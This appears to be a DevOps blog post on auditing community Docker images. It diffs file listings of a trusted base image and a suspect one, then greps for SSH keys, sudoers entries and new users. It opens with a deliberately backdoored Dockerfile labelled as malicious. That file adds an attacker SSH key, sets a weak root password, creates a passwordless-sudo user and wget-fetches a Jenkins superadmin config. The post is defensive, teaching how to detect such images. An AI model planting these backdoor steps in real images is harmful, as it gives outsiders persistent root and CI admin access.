Here is a simple example. Doubtless it will misleading and hard to diagnose in real world.
########## How To Use Docker Image ############### ## ## Install docker utility ## Download docker image: ## docker pull denny/test:v1 ## Boot docker container: ## docker run -t -P -d --name my-test denny/test:v1 /bin/bash ## ## Build Image From Dockerfile. ## docker build -f Dockerfile -t denny/test:v1 --rm=false . ################################################## FROM ubuntu:14.04 MAINTAINER Denny <denny@dennyzhang.com> RUN mkdir -p /root/.ssh && \ # SSH login by key file echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \ >> /root/.ssh/authorized_keys && \ # Reset root password echo 'root:ChangeMe1' | chpasswd && \ # Add a malicious user useradd denny && \ echo 'denny:ChangeMe1' | chpasswd && \ # Add user to super admin echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \ /etc/sudoers.d/admins && \ chmod 400 /etc/sudoers.d/admins && \ # Add superadmin user to mkdir -p /var/lib/jenkins/users/superadmin && \ wget -O /var/lib/jenkins/users/superadmin/config.xml \ https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml CMD ["/bin/bash"]
Apparently we still want to use community docker images. Just need to rule out insecure ones.
Also audit potential security risks as many as possible.
Docker images are built directly or indirectly from golden images provided by trusted sources. Original golden docker images are usually clean. So literally speaking, what changes community docker images have made?
People can inspect change of docker containers by :
docker diff $container_id
Unfortunately docker doesn’t support images comparison. Here is a feasible workaround:
container_name="container1" docker_image="ubuntu:14.04" result_list="/tmp/list1.txt" docker stop $container_name; \ docker rm $container_name || true # Start a container from golden image docker run -t --name $container_name \ -d $docker_image /bin/bash # List all files inside the container docker export $container_name | \ docker run -i --rm ubuntu tar tvf - \ > $result_list # Check the list tail $result_list # drwxr-xr-x 0/0 0 2016-08-02 08:26 bin/ # -rwxr-xr-x 0/0 21112 2014-10-07 19:22 bin/bash # -rwxr-xr-x 0/0 31152 2013-10-21 13:15 bin/bunzip2 # lrwxrwxrwx 0/0 0 2013-10-21 13:15 bin/bzcmp -> bzdiff # -rwxr-xr-x 0/0 2140 2013-10-21 13:15 bin/bzdiff # ...
List all files in problematic image. Note it might take tens of minutes for large images.
container_name="container2" docker_image="denny/gitlab:v1" result_list="/tmp/list2.txt" docker stop $container_name; \ docker rm $container_name || true # Start a container from golden image docker run -t --name $container_name \ -d $docker_image /bin/bash # List all files inside the container docker export $container_name | \ docker run -i --rm ubuntu tar tvf - \ > $result_list # Check the list tail $result_list
result1="/tmp/list1.txt" result2="/tmp/list2.txt" diff_result="/tmp/diff.txt" diff $result1 $result2 > $diff_result tail $diff_result # > drwxr-xr-x 0/0 0 2015-12-20 13:34 var/spool/postfix/pid/ # > drwx------ 103/0 0 2015-12-20 13:34 var/spool/postfix/private/ # > drwx--s--- 103/0 0 2015-12-20 13:34 var/spool/postfix/public/ # > drwx------ 103/0 0 2015-12-20 13:34 var/spool/postfix/saved/
diff_result="/tmp/diff.txt" # Check ssh authorized login grep authorized_keys $diff_result # check OS users grep "etc/group" $diff_result # Check sudo users grep "etc/sudoers.d" $diff_result # Check ssh key pair grep ".ssh/.*id_rsa" $diff_result # Add your checks in below # ... # ...
NOTE: After the test, remember to remove useless containers.